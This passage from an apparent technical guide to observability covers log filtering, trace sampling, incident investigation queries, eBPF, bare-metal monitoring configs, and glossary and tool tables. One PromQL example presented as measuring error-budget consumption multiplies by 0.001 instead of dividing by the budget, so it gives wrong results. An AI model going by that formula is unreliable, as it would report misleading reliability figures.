filtering:** The OTel Collector can drop log entries matching certain patterns before they reach Loki: ```yaml processors: filter: logs: exclude: match_type: regexp record_attributes: - key: level value: DEBUG ``` **Loki retention policies:** Different log streams can have different retention periods. Security audit logs require long retention (1-7 years). Application debug logs need only 7 days. HTTP access logs can be dropped after 30 days. **Stream sharding:** Loki performance degrades with very high-cardinality stream label sets. Ensure that Loki labels are bounded: namespace, app, level are good labels. request_id, user_id, and IP addresses are not. ### Trace Sampling Strategy |Sampling Strategy|Mechanism|Use Case|Tradeoff| |---|---|---|---| |Head-based (rate)|Decision at trace start, 1-10%|Simple, low overhead|Loses errors if they're rare| |Head-based (always error)|Decision at trace start based on context|Capture all errors from start|Requires propagating error context before it's known| |Tail-based|Decision after trace complete|Capture errors + slow traces, drop healthy fast traces|Requires buffering entire traces; OTel Collector overhead| |Adaptive|Dynamic rate based on traffic volume|Maintain target trace volume regardless of load|Complex; requires feedback loop| |Exemplar sampling|Store trace ID on histogram sample|Link specific traces to metric data points|Not true sampling; exemplars are sparse attachments| The recommended production strategy: tail-based sampling in the OTel Collector with policies: keep 100% of errors, keep 100% of traces > 1s, keep 5% of the remainder. This typically reduces trace volume by 90-95% while retaining 100% of actionable traces. --- ## 14. Incident Investigation Using Observability ### The Standard Investigation Workflow A disciplined investigation workflow reduces the time from alert to root cause. The following model works consistently across failure types: ``` [1] Alert Fires │ ▼ [2] What is the user impact? │ Metrics: error rate, latency SLO compliance │ Dashboards: service health overview ▼ [3] When did it start? │ Metrics: annotate deployment events, config changes │ Grafana: correlate alert start with recent changes ▼ [4] Which service(s) are affected? │ Metrics: error rates across all downstream services │ Grafana: service topology graph ▼ [5] What are the errors? │ Logs: ERROR-level logs in the affected time window │ LogQL: {namespace="X"} |= "ERROR" | json ▼ [6] Trace the failing requests │ Traces: search Tempo for error traces in affected service │ TraceQL: {.service.name="X" && status=error} ▼ [7] Identify root cause │ Traces: find the deepest error span │ Logs: correlate trace_id to get full context ▼ [8] Remediate │ Rollback, config change, feature flag toggle, scaling ▼ [9] Verify recovery │ Metrics: confirm error rate returns to baseline │ SLO dashboard: confirm budget burn rate normalizes ▼ [10] Postmortem and action items ``` ### Practical Investigation Commands **Step 2: Quantify impact** ```promql # Current error rate sum(rate(http_requests_total{namespace="payments",status=~"5.."}[5m])) / sum(rate(http_requests_total{namespace="payments"}[5m])) # How much of the 28-day error budget has been consumed today? sum(increase(http_requests_total{status=~"5.."}[24h])) / sum(increase(http_requests_total[28d])) * 0.001 ``` **Step 3: Correlate with changes** ```promql # Compare error rate before and after the suspect deployment sum(rate(http_requests_total{status=~"5.."}[30m] offset 1h)) / sum(rate(http_requests_total[30m] offset 1h)) ``` **Step 5: Query error logs** ```logql # Find all errors in payments namespace in last 30 minutes {namespace="payments"} | json | level="ERROR" | line_format "{{.timestamp}} [{{.service}}] {{.event}}: {{.error}}" # Find errors correlated with a specific deployment {namespace="payments"} | json | level="ERROR" | timestamp >= "2024-03-15T14:00:00Z" and timestamp <= "2024-03-15T14:30:00Z" ``` **Step 6: Find failing traces** ``` TraceQL (Grafana Tempo): {.service.name="payment-service" && status=error} | select(span:http.route, span:http.status_code, resource:service.version) | sort(duration desc) ``` ### Root Cause Analysis Techniques **The Five Whys applied to distributed systems:** 1. _Why is the payment API returning 500 errors?_ → The payment service cannot connect to the fraud service 2. _Why can't it connect to the fraud service?_ → The fraud service connection pool is exhausted 3. _Why is the connection pool exhausted?_ → Requests to the fraud service are taking 10 seconds instead of 100ms 4. _Why is the fraud service responding slowly?_ → The fraud model Redis cache is unavailable 5. _Why is Redis unavailable?_ → The Redis instance was evicted due to node memory pressure after a memory leak in the recommendation service Without distributed tracing, the investigation would have stopped at step 1 with "the fraud service is down." With traces, the full causal chain is recoverable from the telemetry. **Change correlation:** The single most reliable root cause identification technique is correlating the incident start time with recent changes. In a Grafana dashboard with deployment annotations overlaid on error rate metrics, the causal relationship is often immediately visible. Building a discipline of annotating dashboards with deployment events (via the Grafana Annotations API or deployment pipeline webhooks) is high-return investment. --- ## 15. Advanced Observability ### eBPF-Based Observability eBPF (extended Berkeley Packet Filter) is a Linux kernel feature that allows user-defined programs to run in the kernel context, observing and optionally modifying kernel behavior, without kernel module development or application code changes. For observability, eBPF enables: **Zero-instrumentation application tracing:** eBPF programs can intercept system calls, network connections, and function calls in arbitrary processes without modifications to those processes. Tools like Cilium Tetragon, Pixie, and Parca use eBPF to observe application behavior from the kernel. **Network flow observability:** Cilium's eBPF-based dataplane records all network flows (source, destination, protocol, bytes, latency) at the kernel level, generating Prometheus metrics without any application involvement. **CPU profiling:** Continuous CPU profiling (flame graphs) using eBPF samples the call stacks of all processes periodically, attributing CPU time to specific functions. Grafana Pyroscope collects these profiles and correlates them with traces. **Security observability:** eBPF programs can detect system calls associated with container escapes, privilege escalation, and unusual network access patterns. Falco uses eBPF (or kernel modules) for runtime security monitoring. ### Anomaly Detection Rule-based alerting excels at known failure modes (error rate > threshold) but misses anomalies — deviations from normal behavior that are not in advance defined as failure modes. **Statistical anomaly detection** models baseline behavior and alerts on deviations from that baseline. Prometheus can implement simple statistical anomaly detection: ```promql # Alert if current request rate is more than 3 standard deviations from the # average of the same hour over the last 2 weeks (day-of-week adjusted) abs( rate(http_requests_total[5m]) - avg_over_time(rate(http_requests_total[5m])[2w:1h]) ) > 3 * stddev_over_time(rate(http_requests_total[5m])[2w:1h]) ``` More sophisticated anomaly detection uses machine learning models trained on historical telemetry. Platforms like Grafana ML (via the Grafana Grafana ML plugin), Datadog Watchdog, and commercial AIOps products apply ML-based anomaly detection to metrics streams. ### Distributed Tracing Sampling at Scale At very high trace volumes, even tail sampling in the OTel Collector may not be sufficient. Advanced strategies: **Adaptive sampling:** Dynamically adjust sampling rate to maintain a target ingest volume regardless of traffic. At 1,000 RPS, sample 10%. At 10,000 RPS, sample 1%. Implements a feedback loop: if ingest rate is above target, reduce sampling probability; if below, increase it. **Stratified sampling:** Sample at different rates for different service tiers. Payment processing traces (high value): 100% sampling. Internal health checks: 0% sampling. User-facing API calls: 5% sampling. **Continuous profiling integration:** Attaching CPU profiles to traces for the slowest spans allows identification of the specific code paths responsible for latency, not just the service or endpoint. ### AI-Driven Observability Artificial intelligence is beginning to augment observability workflows in several practical ways: **Automated root cause analysis:** ML models trained on historical incident data and telemetry can suggest probable root causes when a new incident occurs, reducing MTTD. Tools like Grafana Sift (in preview as of 2025) analyze metrics, logs, and traces together to surface likely causes. **Alert noise reduction:** ML classifiers trained on historical alert data can identify alerts that consistently resolve without human intervention and suppress them automatically, reducing alert fatigue. **Natural language query:** LLM-based interfaces that translate natural language questions ("Why is the payment API slow right now?") into PromQL/LogQL/TraceQL queries, lowering the barrier to observability for engineers unfamiliar with query languages. **Capacity forecasting:** Time-series forecasting models predict when resources will be exhausted based on historical growth trends, enabling proactive scaling before performance degrades. The important limitation: AI-driven observability augments human judgment; it does not replace it. Automated suggestions require human validation, and model outputs on novel failure modes (which are precisely the incidents that matter most) are inherently less reliable. --- ## 16. Observability for Bare-Metal Infrastructure ### Physical Server Monitoring Bare-metal infrastructure requires observability at layers that cloud-native tooling often abstracts away: hardware health, IPMI/BMC metrics, hardware RAID status, physical network switch metrics. **IPMI/BMC metrics** (via the ipmi_exporter): ```bash # CPU temperature, fan speeds, power consumption, hardware health ipmi_fan_speed_rpm{name="Fan 1"} ipmi_temperature_celsius{name="CPU1 Temp"} ipmi_power_watts{name="Pwr Consumption"} ipmi_sensor_state{name="Drive Fault", state="ok"} ``` **Hardware RAID monitoring** (via smartmontools and mdadm exporters): ```bash # SMART disk health smartmon_device_smart_healthy{disk="/dev/sda", type="sat"} smartmon_attr_value{disk="/dev/sda", name="Reallocated_Sector_Ct"} # Software RAID (mdadm) node_md_state{device="md0"} node_md_disks_active{device="md0"} node_md_disks{device="md0", state="failed"} ``` **Network switch monitoring** (via SNMP exporter): ```yaml # snmp.yml modules: cisco_ios: walk: [ifDescr, ifOperStatus, ifInOctets, ifOutOctets, ifInErrors, ifOutErrors] metrics: - name: ifOperStatus oid: 1.3.6.1.2.1.2.2.1.8 type: gauge help: "Current operational state of the interface" - name: ifInErrors oid: 1.3.6.1.2.1.2.2.1.14 type: counter help: "Number of inbound packets that had errors" ``` **Bare-metal server Prometheus scrape targets** (static configuration): ```yaml # prometheus.yml scrape_configs: - job_name: 'bare_metal_nodes' static_configs: - targets: - 'server-01.dc1.internal:9100' - 'server-02.dc1.internal:9100' - 'server-03.dc2.internal:9100' labels: datacenter: dc1 rack: A-12 - job_name: 'ipmi' metrics_path: /metrics params: target: - 'server-01-ipmi.internal' static_configs: - targets: ['ipmi-exporter:9290'] relabel_configs: - source_labels: [__param_target] target_label: instance ``` ### Storage Array Observability Enterprise storage arrays (NetApp, Pure Storage, Dell EMC) expose management APIs that can be scraped for performance and capacity metrics. Vendor-specific exporters exist for most major platforms: ```prometheus # NetApp ONTAP metrics (via netapp-harvest) netapp_volume_read_ops_total{svm="payments_svm", volume="transactions_vol"} netapp_volume_average_latency_microseconds{svm="payments_svm", volume="transactions_vol"} netapp_volume_size_available_bytes{svm="payments_svm", volume="transactions_vol"} netapp_disk_busy_percentage{disk="0a.00.0"} ``` --- ## 17. The Future of Observability ### Convergence of Telemetry Types The traditional three-pillar model (metrics, logs, traces) is evolving toward a more unified model. OpenTelemetry's data model treats all three telemetry types as first-class citizens under a single data model, enabling correlation and enrichment that crosses pillar boundaries. Emerging fourth pillar: **continuous profiling**. CPU and memory profiles, attached to traces and correlated with metrics, give a level of code-level detail that none of the traditional three pillars provides. Grafana Pyroscope, Polar Signals, and Parca represent this category. The combination of trace span + CPU flame graph for the same request duration allows precise identification of the code path responsible for latency, not just the service or function. ### eBPF as the Universal Instrumentation Layer eBPF's trajectory suggests it will become the dominant instrumentation mechanism for infrastructure observability. Its advantages — zero application modification, kernel-level visibility, near-zero overhead compared to agent-based approaches — make it particularly compelling for large-scale environments with heterogeneous applications. The practical implication: the distinction between "instrumented" and "uninstrumented" applications will fade. All applications running on a modern Linux kernel with eBPF tooling will produce meaningful telemetry, regardless of whether application developers wrote any instrumentation code. ### OpenTelemetry as the Universal Standard OpenTelemetry is well on its way to becoming the universal instrumentation standard for cloud-native applications. As of 2025-2026, virtually every major observability backend has adopted OTLP (OpenTelemetry Protocol) as a primary ingest format. Proprietary instrumentation agents (Datadog Agent, New Relic agent) now serve primarily as configuration and enrichment layers on top of OTel SDKs. The practical implication: investment in OpenTelemetry instrumentation is durable. As backends are replaced or consolidated, instrumentation code remains valid. The instrumentation-backend coupling that locked organizations into specific vendors for decades is being broken. ### AI-Augmented Operations The 2025-2030 timeframe will see AI and LLM capabilities integrated deeply into observability tooling. The most likely developments: **Automated incident triage:** AI systems that receive alert notifications, query relevant telemetry, correlate with deployment history, and produce structured incident summaries within minutes of alert firing — reducing the cognitive load on on-call engineers at the most stressful point of an incident. **Proactive anomaly detection:** ML models continuously watching all metrics streams for deviations from learned baselines, detecting potential incidents before they become user-impacting. **Natural language observability:** Conversational interfaces for querying telemetry, making observability accessible to engineers who are not experts in PromQL, LogQL, or TraceQL. **Self-healing systems:** Closed-loop automation where AI systems not only detect and diagnose incidents but execute remediation actions — scaling deployments, rolling back releases, toggling feature flags — with human approval required only for high-risk actions. The caution: these capabilities augment human judgment but cannot replace it. AI systems trained on historical data are most confident about the failure modes they have seen before, and least reliable for novel failures — precisely the incidents that matter most. The observability engineer's role evolves from "query the telemetry to find the answer" to "design the instrumentation and AI context that enables automated triage, and validate AI outputs against production reality." --- ## 18. Large Observability Glossary The following table defines 100 key technical terms used in modern observability, monitoring, and distributed systems operations. |Term|Category|Explanation|Formula / Tool|Example| |---|---|---|---|---| |SLI (Service Level Indicator)|Reliability|Quantitative measurement of a specific service behavior aspect|Measured ratio: successes / total requests|99.2% of payments completed in < 500ms| |SLO (Service Level Objective)|Reliability|Internal target range for an SLI over a time window|Target threshold over rolling window|99.9% of payments must succeed over 28 days| |SLA (Service Level Agreement)|Reliability|External contractual commitment to customers, backed by penalties|SLA < SLO (must have engineering headroom)|Contract guarantees 99.5% API availability| |Error Budget|Reliability|Allowable non-compliance time derived from the SLO|1 - SLO (e.g., 0.1% = ~43min/month for 99.9%)|43 minutes of downtime allowed per month| |Burn Rate|Reliability|Rate at which error budget is consumed relative to budget|Error Rate / (1 - SLO)|Burn rate of 2x means budget exhausted in 14 days| |MTTR (Mean Time To Recover)|Reliability|Average time from failure detection to service restoration|Sum(recovery times) / incident count|Average incident resolved in 22 minutes| |MTBF (Mean Time Between Failures)|Reliability|Average time between incidents|Total uptime / number of incidents|Payment service fails on average every 45 days| |MTTD (Mean Time To Detect)|Reliability|Average time from failure start to detection|Sum(detection times) / incident count|Monitoring detects failures within 90 seconds| |MTTA (Mean Time To Acknowledge)|Reliability|Average time from alert fire to engineer response|Sum(ack times - alert times) / alerts|On-call acknowledges within 4 minutes| |Availability|Reliability|Percentage of time service meets SLO|(Total Time - Downtime) / Total Time × 100|Payment API 99.97% available last quarter| |Toil|SRE|Manual, repetitive, automatable operational work|Toil hours / Total engineering hours|Manually restarting pods after OOM kills| |Golden Signals|Observability|Latency, Traffic, Errors, Saturation — minimum viable telemetry|4 metrics categories (Google SRE)|HTTP latency p99, RPS, 5xx rate, CPU%| |Metric|Metrics|Numeric time-series measurement with labels|value{labels} @ timestamp|`http_requests_total{status="200"} 15423`| |Counter|Metrics|Monotonically increasing metric, reset only on restart|rate(counter[window]) for rate calculation|`http_requests_total` increases with each request| |Gauge|Metrics|Metric that can increase or decrease|Current value meaningful|`node_memory_MemAvailable_bytes`| |Histogram|Metrics|Distribution of values across pre-defined buckets|histogram_quantile(0.99, sum(rate(metric_bucket[5m])) by (le))|Request latency distribution by bucket| |Summary|Metrics|Pre-computed quantiles on the client side|quantile label carries percentile|p50, p90, p99 latency calculated by app| |Cardinality|Metrics|Number of unique time series for a metric|Count of unique label value combinations|1M unique user_ids = 1M time series (problematic)| |Label|Metrics|Key-value metadata attached to a metric|`{key="value"}` in Prometheus format|`{service="payment", env="prod"}`| |PromQL|Metrics|Prometheus Query Language for time-series data|Functional language with aggregation, math, time functions|`rate(http_errors[5m]) / rate(http_requests[5m])`| |Recording Rule|Metrics|Pre-computed PromQL expression stored as new time series|Evaluates on interval, stores result|Pre-compute p99 latency to speed dashboards| |Alerting Rule|Metrics|PromQL expression that triggers alert when true for duration|`expr > threshold for: duration`|`error_rate > 0.05 for: 5m` → PagerDuty| |Remote Write|Metrics|Protocol for Prometheus to send metrics to remote storage|HTTP POST with Snappy-compressed protobuf|Prometheus → Grafana Mimir via remote_write| |Scraping|Metrics|Prometheus polling a target's /metrics HTTP endpoint|Pull model; Prometheus controls schedule|Prometheus scrapes node_exporter every 15s| |Exporter|Metrics|Adapter exposing non-native metrics in Prometheus format|Translates system metrics to /metrics endpoint|postgres_exporter exposes PG metrics| |node_exporter|Metrics|Prometheus exporter for Linux OS and hardware metrics|DaemonSet on each node|CPU, memory, disk, network metrics per host| |kube-state-metrics|Kubernetes|Exporter for Kubernetes object state metrics|Reads K8s API, exposes as Prometheus metrics|`kube_pod_status_phase`, `kube_deployment_status_replicas`| |cAdvisor|Kubernetes|Container resource usage metrics (built into kubelet)|`/metrics/cadvisor` on kubelet port|`container_cpu_usage_seconds_total`| |Prometheus Operator|Kubernetes|Kubernetes operator managing Prometheus via CRDs|ServiceMonitor, PrometheusRule, Alertmanager CRDs|Teams define ServiceMonitors for auto-discovery| |ServiceMonitor|Kubernetes|CRD defining scrape configuration for a service|`monitoring.coreos.com/v1`|Describes how to scrape payment-service metrics| |PrometheusRule|Kubernetes|CRD defining alerting and recording rules|Applied automatically by Prometheus Operator|Alert rule as Kubernetes resource in namespace| |HPA|Kubernetes|Horizontal Pod Autoscaler — scales pod count on metrics|`desired = current × (currentMetricValue / desiredMetricValue)`|Scale to 20 pods when RPS per pod > 1000| |PDB|Kubernetes|PodDisruptionBudget — min available pods during disruption|minAvailable or maxUnavailable|Keep 2/3 pods running during node drain| |etcd|Kubernetes|Distributed KV store for all Kubernetes cluster state|Raft consensus protocol|Stores every pod spec, configmap, secret| |Log|Logs|Event record produced by application or infrastructure|Structured (JSON) or unstructured (plain text)|`{"level":"ERROR","event":"payment_failed"}`| |Structured Log|Logs|Log record in machine-readable format (JSON)|Key-value fields enable querying|`{"trace_id":"abc", "user_id":"123", "error":"timeout"}`| |Log Level|Logs|Severity classification of a log entry|DEBUG, INFO, WARN, ERROR, FATAL|ERROR level requires operator attention| |Log Aggregation|Logs|Centralized collection of logs from multiple sources|Shipper → Storage → Query|Promtail → Loki → Grafana| |Loki|Logs|Horizontally scalable log aggregation system|Labels for index, object storage for content|Grafana Loki indexes {namespace, app, level}| |LogQL|Logs|Grafana Loki query language|Log pipeline and metric queries|`{namespace="payments"} \|= "ERROR" \| json`| |Promtail|Logs|Log collector agent that ships to Loki|DaemonSet tailing /var/log/pods/|Enriches logs with K8s metadata| |Log Retention|Logs|Duration for which logs are stored|Configurable per stream in Loki|Security logs: 1 year, Debug logs: 7 days| |Trace|Tracing|Complete record of a request's path across services|Root span + child spans forming tree|Full payment journey from browser to database| |Span|Tracing|Single unit of work within a trace|span_id, trace_id, parent_id, start_time, duration|`fraud.Evaluate`: 48ms, status OK| |Trace Context|Tracing|Metadata propagated with a request across service boundaries|W3C `traceparent` header|`00-4bf92f3577b34da6-00f067aa0ba902b7-01`| |Distributed Tracing|Tracing|Tracking requests across multiple services|Context propagation + span collection|Trace from browser through 5 microservices| |Tempo|Tracing|Grafana distributed tracing backend|Object storage backend, TraceQL query|Stores 1TB/day of trace data at $0.02/GB| |TraceQL|Tracing|Grafana Tempo's trace query language|Attribute-based trace search|`{.service.name="X" && status=error && duration>1s}`| |Exemplar|Tracing|Trace ID attached to a histogram metric sample|Prometheus exemplar format|Latency spike linked to trace for investigation| |OpenTelemetry|Standards|CNCF vendor-neutral telemetry standard (API+SDK+protocol)|Unifies OT instrumentation across languages|Go app sends OTLP to Collector → Tempo + Mimir| |OTLP|Standards|OpenTelemetry Protocol for telemetry transmission|Protobuf over gRPC or HTTP|OTel SDK → Collector via grpc:4317| |OTel Collector|Standards|Vendor-agnostic telemetry pipeline: receive, process, export|Receivers → Processors → Exporters|Tail samples traces before forwarding to Tempo| |W3C TraceContext|Standards|Standard HTTP headers for trace context propagation|`traceparent`, `tracestate` headers|All services must propagate to enable full traces| |RED Method|Methodology|Rate, Errors, Duration — API observability model|Counter, Counter, Histogram|Payment API: 1200 RPS, 0.2% errors, 120ms p99| |USE Method|Methodology|Utilization, Saturation, Errors — resource observability|Gauge/Percentage, Queue/Delay, Counter|DB: 70% CPU, 5 waiting connections, 0 errors| |Four Golden Signals|Methodology|Latency, Traffic, Errors, Saturation (Google SRE)|Four metric types|Minimum viable production monitoring| |Head-Based Sampling|Tracing|Sampling decision made at trace start|Fixed % or coin flip|Sample 10% of all traces| |Tail-Based Sampling|Tracing|Sampling decision made after trace complete|Policy on full trace attributes|Keep 100% errors, 1% successful traces| |Alertmanager|Alerting|Prometheus companion for alert routing, dedup, notification|Dedup → Group → Route → Deliver|Routes critical alerts to PagerDuty, info to Slack| |Alert Fatigue|Alerting|Engineer desensitization from excessive non-actionable alerts|High noise-to-signal ratio|On-call ignores page because "it always fires"| |Inhibition|Alerting|Suppressing child alerts when parent alert is active|Source match → suppress target|Suppress service alerts when entire cluster is down| |Silence|Alerting|Temporary suppression of specific alert|Time-bounded label match|Silence disk alert during planned migration| |Grafana|Visualization|Open-source observability and data visualization platform|Multi-datasource; dashboards, panels, alerting|Dashboards for Prometheus, Loki, Tempo, Mimir| |Dashboard|Visualization|Collection of panels sharing time range and variables|Grid of panels with parameterized queries|Service health dashboard with namespace selector| |Panel|Visualization|Individual visualization unit in Grafana|Time series, Stat, Gauge, Table, Heatmap|p99 latency time series panel| |Heatmap|Visualization|2D density chart showing distribution over time|X: time, Y: value bucket, Color: count|Latency distribution showing bimodal behavior| |Grafana Mimir|Storage|Horizontally scalable Prometheus-compatible metrics storage|Object storage backend (S3), multi-tenant|Long-term metrics retention at low cost| |Grafana Pyroscope|Profiling|Continuous profiling storage and visualization|CPU flame graphs, memory profiles|Identify hot code path causing CPU spike| |eBPF|Advanced|Linux kernel feature for safe in-kernel programs|Kernel hooks without module development|Capture all syscalls for security audit| |Flame Graph|Profiling|CPU time attribution visualization by call stack|Y: call depth, X: time proportion|Identify 40% of CPU in JSON serialization| |Service Mesh|Infrastructure|Network proxy layer providing mTLS, observability, policy|Sidecar proxy (Envoy) per pod|Istio provides metrics/traces for all services| |mTLS|Security|Mutual TLS — both parties authenticate via certificate|X.509 client + server cert verification|All inter-service calls authenticated and encrypted| |Zero Trust|Security|No implicit trust from network location|Authenticate + authorize every request|Pod in same namespace still needs service account| |Anomaly Detection|Advanced|Identifying deviations from established baseline|Statistical: mean ± N×stddev; ML: learned models|Traffic 3x above 2-week average triggers alert| |Log Cardinality|Logs|Number of unique label values in Loki streams|Count(unique label combinations)|High cardinality degrades Loki query performance| |Metric Aggregation|Metrics|Combining multiple time series into one|sum(), avg(), max(), min() by (label)|Sum error rates across 200 pods by service| |Time Window|Metrics|Duration for rate/average/percentile calculation|[5m], [1h], [28d] in PromQL|`rate(metric[5m])` = per-second rate over 5m| |Federation|Metrics|Hierarchical Prometheus pulling from other Prometheuses|Parent Prometheus scrapes child via /federate|Central Prometheus aggregates all cluster metrics| |Thanos|Metrics|CNCF project for Prometheus HA and long-term storage|Sidecar + Store + Query components|Compatible alternative to Mimir| |Cortex|Metrics|CNCF project for horizontally scalable Prometheus storage|Predecessor to Grafana Mimir|Used by Grafana Cloud infrastructure| |TSDB|Metrics|Time Series Database — Prometheus's local storage engine|2-hour blocks, WAL, Gorilla compression|1.3 bytes/sample compressed on disk| |Ingester|Metrics|Mimir/Loki/Tempo component receiving and buffering writes|In-memory + WAL before flush to object storage|3 ingesters for replication factor 3| |Compaction|Metrics|Merging small TSDB blocks into larger ones|Background process, improves query performance|2h blocks compacted to 6h, 24h, 7d blocks| |Retention|Metrics|Duration for which metrics/logs/traces are stored|Configurable; cost vs utility tradeoff|Metrics 1 year in Mimir, logs 30 days in Loki| |Synthetic Monitoring|Observability|Scripted simulation of user journeys to test availability|External probe from multiple locations|Blackbox exporter pinging API every 30s| |RUM|Frontend|Real User Monitoring — telemetry from actual users' browsers|Web Vitals API, OTel JS SDK|300ms LCP measured from 10,000 real browser loads| |LCP|Frontend|Largest Contentful Paint — when main content loads|Browser Performance API|Good: <2.5s; Poor: >4s| |INP|Frontend|Interaction to Next Paint — UI responsiveness|Browser Performance API|Good: <200ms; Poor: >500ms| |Service Topology|Observability|Map of service dependencies from telemetry|Derived from trace spans + service mesh data|Grafana node graph showing all inter-service calls| |Dependency Map|Observability|Visualization of upstream/downstream service relationships|Generated from trace span relationships|Payment service depends on fraud, inventory, DB| |SLO Compliance|Reliability|Fraction of time SLO has been met over measurement window|Compliant time / Total time|99.94% of 28-day window meeting SLO = budget spent| |Error Budget Policy|Reliability|Defined team response to different error budget consumption levels|Trigger conditions for freeze, sprint, exec review|<25% remaining → reliability sprint, no new features| |Postmortem|Incident|Blameless retrospective analysis of production incident|Blameless, systemic, action-item-producing|5-why analysis identifying SMTP relay as root cause| |Flakiness|CI/CD|Test failing intermittently without code changes|Failure rate > 1% without code change|Database integration test timing-sensitive| |Lead Time|DORA|Time from code commit to production deployment|Deploy timestamp - commit timestamp|Average 45 minutes from commit to production| |Deployment Frequency|DORA|How often code is deployed to production|Deploys per day/week|12 production deployments per day| |Change Failure Rate|DORA|Percentage of deployments causing production incidents|Failing deploys / total deploys|2% of deploys require rollback| |Canary Deployment|Delivery|Route small % of traffic to new version before full rollout|Traffic split: 1% → 5% → 25% → 100%|2% of payments routed to new service version| |Feature Flag|Delivery|Code switch enabling/disabling functionality without deploy|Boolean/percentage rollout in config|New payment method enabled for 10% of users| |OOM Kill|Kubernetes|Container terminated by kernel when memory limit exceeded|Memory usage > limit → SIGKILL|Recommendation service killed for using 2GB limit| |CrashLoopBackOff|Kubernetes|Pod repeatedly restarting due to liveness probe failure|Exponential backoff: 10s, 20s, 40s, 80s...|Service failing liveness probe due to upstream down| |Tail Latency|Performance|Latency at high percentiles (p99, p99.9)|histogram_quantile(0.99, ...)|p99 = 850ms despite p50 = 45ms| |Saturation|Performance|How full a resource is; leading indicator of failure|current_usage / capacity|85% thread pool utilization predicts degradation| |Backpressure|Architecture|Mechanism for slow consumers to signal overload to producers|Blocking, drop, or buffer with feedback|Kafka consumer lag signals slow Loki ingestion| |Circuit Breaker|Architecture|Stops calls to failing dependency to prevent cascade|Closed → Open → Half-open state machine|Stops calling fraud service after 50% errors| |Bulkhead|Architecture|Resource isolation to prevent cross-domain failure|Separate thread pools per dependency|DB pool for transactions separate from reports| |Dead Letter Queue|Architecture|Destination for messages that exceed retry limit|Consumer fails N times → DLQ|Failed payment events queued for manual review| |Sampling|Tracing|Deciding which fraction of traces to store|Head-based %, tail-based policy|Store 100% errors, 5% successful traces| --- ## 19. DevOps Metrics Reference Table |Metric|Full Name|Meaning|Formula|Tool / Source|Elite Benchmark| |---|---|---|---|---|---| |DF|Deployment Frequency|How often code is deployed to production|Count(production deploys) / time period|CI/CD platform (GitHub Actions, GitLab, Jenkins)|Multiple per day| |LT|Lead Time for Changes|Elapsed time from commit to production|Deploy timestamp - first commit timestamp|VCS + CI/CD webhook|< 1 hour| |CFR|Change Failure Rate|% of deploys causing production incidents|Incidents caused by deploy / total deploys × 100|Deploy events + incident events|< 5%| |MTTR|Mean Time To Restore|Average time from incident detection to recovery|Sum(resolution time - detection time) / incidents|Incident management (PagerDuty, OpsGenie)|< 1 hour| |MTTD|Mean Time To Detect|Average time from failure start to alert firing|Sum(alert time - failure start time) / incidents|Monitoring system alert timestamps|< 2 minutes| |MTTA|Mean Time To Acknowledge|Average time from alert to engineer response|Sum(ack time - alert time) / alerts|On-call platform metrics|< 5 minutes| |MTBF|Mean Time Between Failures|Average time between production incidents|Total uptime / number of incidents|Incident tracking system|> 30 days| |Availability|Availability %|Fraction of time service meets SLO|(Total time - downtime) / total time × 100|SLO monitoring (Prometheus, Grafana)|> 99.99%| |Error Budget|Error Budget|Allowable non-compliance derived from SLO|1 - SLO target|Prometheus + Grafana SLO dashboard|> 50% remaining| |Burn Rate|Error Budget Burn Rate|Speed at which error budget is consumed|Error rate / (1 - SLO)|Prometheus multi-window alerting|< 1x (on track)| |TFR|Test Flakiness Rate|% of CI runs with non-deterministic test failures|Flaky failures / total test runs|CI analytics (Trunk, BuildKite Analytics)|< 1%| |BSR|Build Success Rate|% of CI pipeline runs that complete successfully|Successful builds / total builds × 100|CI platform metrics|> 95%| |p99 Latency|99th Percentile Latency|Slowest 1% of request response times|histogram_quantile(0.99, rate(duration_bucket[5m]))|Prometheus histogram|Context-dependent SLO| |RPS|Requests Per Second|Current traffic volume|rate(http_requests_total[5m])|Prometheus|Baseline × capacity headroom| |ERR|Error Rate|Fraction of requests returning errors|rate(errors[5m]) / rate(requests[5m])|Prometheus|< SLO threshold| |CPU Util|CPU Utilization|Fraction of CPU capacity in use|1 - avg(rate(node_cpu_idle[5m]))|node_exporter|< 70% sustained| |Mem Pressure|Memory Utilization|Fraction of memory capacity in use|1 - node_memory_available / node_memory_total|node_exporter|< 80%| |Alert Noise|Alert-to-Incident Ratio|Fraction of alerts that represent real incidents|Real incidents / total alert fires|Alertmanager + incident platform|> 50% (half alerts are real)| |On-Call Load|Pages Per Week Per Engineer|Volume of operational interruptions per engineer|Total pages / (engineer count × week)|PagerDuty / OpsGenie|< 5 per week| --- ## 20. Observability Tools Reference Table |Tool|Category|Primary Purpose|Backend|Deployment|License|Managed Option| |---|---|---|---|---|---|---| |Prometheus|Metrics|Time-series metrics collection and storage|Local TSDB|Single binary|Apache 2.0|None (OSS only)| |Grafana|Visualization|Dashboards, alerting, data exploration|Multiple data sources|Container/VM|AGPL 3.0|Grafana Cloud| |Grafana Loki|Logs|Log aggregation and querying|Object storage (S3/GCS)|Kubernetes/VM|AGPL 3.0|Grafana Cloud| |Grafana Tempo|Tracing|Distributed trace storage and querying|Object storage (S3/GCS)|Kubernetes|Apache 2.0|Grafana Cloud| |Grafana Mimir|Metrics|Horizontally scalable Prometheus storage|Object storage (S3/GCS)|Kubernetes|AGPL 3.0|Grafana Cloud| |Grafana Pyroscope|Profiling|Continuous profiling (CPU/memory flame graphs)|Object storage|Kubernetes|AGPL 3.0|Grafana Cloud| |Grafana Alloy|Collection|Unified telemetry agent (metrics, logs, traces)|All Grafana backends|DaemonSet/binary|Apache 2.0|None| |OpenTelemetry|Standards|Vendor-neutral telemetry instrumentation SDK+protocol|Any OTLP backend|Library/agent|Apache 2.0|None (standard)| |OTel Collector|Collection|Telemetry pipeline: receive, process, export|Multiple exporters|Container/DaemonSet|Apache 2.0|None| |Alertmanager|Alerting|Alert routing, deduplication, notification delivery|In-memory + filesystem|Container|Apache 2.0|None| |Prometheus Operator|Kubernetes|Kubernetes operator for Prometheus lifecycle|CRD-based|Kubernetes operator|Apache 2.0|None| |kube-state-metrics|Kubernetes|Kubernetes object state metrics for Prometheus|None (exporter)|K8s Deployment|Apache 2.0|None| |node_exporter|Metrics|Linux OS and hardware metrics|None (exporter)|DaemonSet/systemd|Apache 2.0|None| |cAdvisor|Kubernetes|Container resource metrics (embedded in kubelet)|None (exporter)|Built into kubelet|Apache 2.0|None| |Blackbox Exporter|Probing|External endpoint availability probing|None (exporter)|Container/VM|Apache 2.0|None| |Promtail|Logs|Log collection agent for Loki|Grafana Loki|DaemonSet|Apache 2.0|None| |Thanos|Metrics|Prometheus HA and long-term storage|Object storage (S3/GCS)|Kubernetes|Apache 2.0|None| |Jaeger|Tracing|Distributed 